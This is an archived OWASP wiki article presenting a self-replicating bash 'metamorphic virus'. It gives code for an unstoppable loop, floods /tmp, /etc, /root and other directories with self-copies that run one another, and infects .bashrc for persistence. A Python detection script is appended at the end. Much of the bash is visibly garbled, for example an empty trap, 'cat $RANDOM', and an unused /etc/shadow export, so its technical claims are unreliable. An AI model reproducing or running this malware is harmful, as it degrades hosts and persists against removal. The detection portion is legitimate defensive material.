This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
Metamorphic Virology
Rudimentary Metamorphic Virology By Gregory Disney-Leugers
Download at: https://docs.google.com/a/owasp.org/file/d/0B3OSDccoP1KhbVkzWE1TZ3hSS0k/edit?usp=sharing
Virology should be viewed as evolutionary biology applied in code; to demonstrate this I wrote a bash script. This code is metamorphic in the sense of being self-modifying and self-propagating. The script covers the three main attributes of metamorphic virology: the methods of survival, reproduction, and exploitation.
Survival:
#!/bin/bash
trap INT
for (( ; ; ))
do
The first line, "trap INT", creates a lock on the process, meaning that once it is activated, Ctrl+C can't stop the process. Generally speaking, with a loop such as the second and third lines, a PID would be recorded to ensure that it could be stopped. In this script no PID is recorded, to ensure survival.
Reproduction:
#!/bin/bash
export RESOLV_HOST_CONF=/etc/shadow
trap INT
for (( ; ; ))
do
  FILE="/tmp/$(basename $0).$RANDOM."
  echo $FILE > $FILE
  FILES="/var/$(basename $0).$RANDOM."
  echo $FILES > $FILES
  FILEZ="/etc/$(basename $0).$RANDOM."
  echo $FILEZ > $FILEZ
  FILE="/tmp/$(basename $0).$RANDOM."
  echo $FILE > $FILE
  FILES="/var/$(basename $0).$RANDOM."
  echo $FILES > $FILES
  FILEZ="/etc/$(basename $0).$RANDOM."
  echo $FILEZ > $FILEZ
  FILER="/run/$(basename $0).$RANDOM."
  echo $FILER > $FILER
  FILEQ="/root/$(basename $0).$RANDOM."
  echo $FILEQ > $FILEQ
The script now has a loop that produces blank files, roughly 7 per kernel second. Each file name is built from the script's basename followed by a random number.
  cd /root && chmod u+x /root/$(basename $0).$RANDOM. && cat >~/$(basename $0).$RANDOM. <<FSS
#!/bin/bash
trap INT
for (( ; ; ))
do
  FILE="/tmp/$(basename $0).$RANDOM."
  echo $FILE > $FILE
  FILES="/var/$(basename $0).$RANDOM."
  echo $FILES > $FILES
  FILEZ="/etc/$(basename $0).$RANDOM."
  echo $FILEZ > $FILEZ
  FILE="/tmp/$(basename $0).$RANDOM."
  echo $FILE > $FILE
  FILES="/var/$(basename $0).$RANDOM."
  echo $FILES > $FILES
  FILEZ="/etc/$(basename $0).$RANDOM."
  echo $FILEZ > $FILEZ
  FILER="/run/$(basename $0).$RANDOM."
  echo $FILER > $FILER
  FILEQ="/root/$(basename $0).$RANDOM."
  echo $FILEQ > $FILEQ
Using cat, the original loop reproduction script is now written into each of the generated files.
  ssh lt 2>/tmp/$(basename $0).$RANDOM.
  cat /tmp/$(basename $0).$RANDOM.|awk -F"\`" {'print $RANDOM'}|awk -F"\'" {'print $RANDOM'}
  while /bin/true ; do
    for i in $(basename $0)/* ; do
      if [ -w $i -a -c $i -a $i != $RANDOM ]; then
        cat $RANDOM > $i
      fi
    done
  done
  exec ~/$(basename $0).$RANDOM.
FSS
Using cat, the tmp files are now written with a bidien payload. Everything from the first FSS marker to the second is one output file.
#!/bin/bash
trap INT
for (( ; ; ))
do
  FILE="/tmp/linware.1554."
  echo /tmp/linware.13359. > /tmp/linware.13359.
  FILES="/var/linware.8552."
  echo /var/linware.13938. > /var/linware.13938.
  FILEZ="/etc/linware.15018."
  echo /etc/linware.1714. > /etc/linware.1714.
  FILE="/tmp/linware.12031."
  echo /tmp/linware.13359. > /tmp/linware.13359.
  FILES="/var/linware.28141."
  echo /var/linware.13938. > /var/linware.13938.
  FILEZ="/etc/linware.29119."
  echo /etc/linware.1714. > /etc/linware.1714.
  FILER="/run/linware.21852."
  echo /run/linware.18072. > /run/linware.18072.
  FILEQ="/root/linware.14767."
  echo /root/linware.22566. > /root/linware.22566.
  ....
  exec ~/linware.22566.
Here is a sample of the output script produced by the script above; at the end, it executes another output script. This chain can be used to map the propagation of the malware.
Exploitation:
  cat >~/.bashrc <<ASS
/opt/linware
/bin/linware
/etc/linware
/run/linware
ASS
  cp /opt/linware /bin
  cp /opt/linware /etc
  exec /opt/linware
  exec ~/$(basename $0).$RANDOM
Using cat once again, the script writes to .bashrc, infecting bash to ensure survival. At the end of the loop the script starts itself all over again.
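The artifacts described above (files named "basename.number." scattered across directories, and bare program paths appended to .bashrc) are what an analyst would hunt for on a suspect host. The following is an added detection example, not part of the original article or the author's script; it assumes the file-name shape "<base>.<$RANDOM>." with $RANDOM in 0..32767, and builds its sample files in a scratch directory rather than touching /tmp or /etc.

```python
import re
import tempfile
from pathlib import Path

# Name shape produced by the reproduction loop: "<basename>.<$RANDOM>." (assumption: $RANDOM is 0..32767)
DROP_NAME = re.compile(r"^(?P<base>[^/\s]+)\.(?P<rand>\d{1,5})\.$")
# An rc-file line that is nothing but an absolute path: it runs on every interactive shell start
BARE_PATH = re.compile(r"^\s*(/[^\s#]+)\s*$")

def find_dropped_files(directory):
    """Group regular files named <base>.<number>. by base; many siblings sharing a base is the loop's footprint."""
    groups = {}
    for p in Path(directory).iterdir():
        m = DROP_NAME.match(p.name)
        if m and p.is_file() and int(m["rand"]) <= 32767:
            groups.setdefault(m["base"], []).append(p.name)
    return {base: sorted(names) for base, names in groups.items()}

def bashrc_launch_lines(text):
    """Return the lines of an rc file that consist solely of an absolute path."""
    return [m.group(1) for m in map(BARE_PATH.match, text.splitlines()) if m]

def demo():
    """Constructed sample: a scratch directory standing in for /tmp, plus a constructed tampered .bashrc."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for n in (1554, 13359, 12031):              # dropped files, each containing its own path
            f = root / f"linware.{n}."
            f.write_text(str(f) + "\n")
        (root / "notes.txt").write_text("benign\n")  # unrelated file, must not be reported
        dropped = find_dropped_files(root)
    rc = "# ~/.bashrc\nexport PATH=$PATH:/usr/local/bin\n/opt/linware\n/bin/linware\nalias ll='ls -l'\n"
    return dropped, bashrc_launch_lines(rc)

if __name__ == "__main__":
    dropped, launches = demo()
    for base, names in dropped.items():
        print(f"{base}: {len(names)} dropped files -> {names}")
    print("rc lines that execute a bare path:", launches)
```

On a real host, point find_dropped_files at /tmp, /var, /etc, /run and /root and feed the contents of each user's .bashrc to bashrc_launch_lines; a base name that shows up in several of those directories at once is the pattern to triage.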
WARNING: this script should only be used in a controlled environment such as a VM.
WARNING: this script should be considered malicious.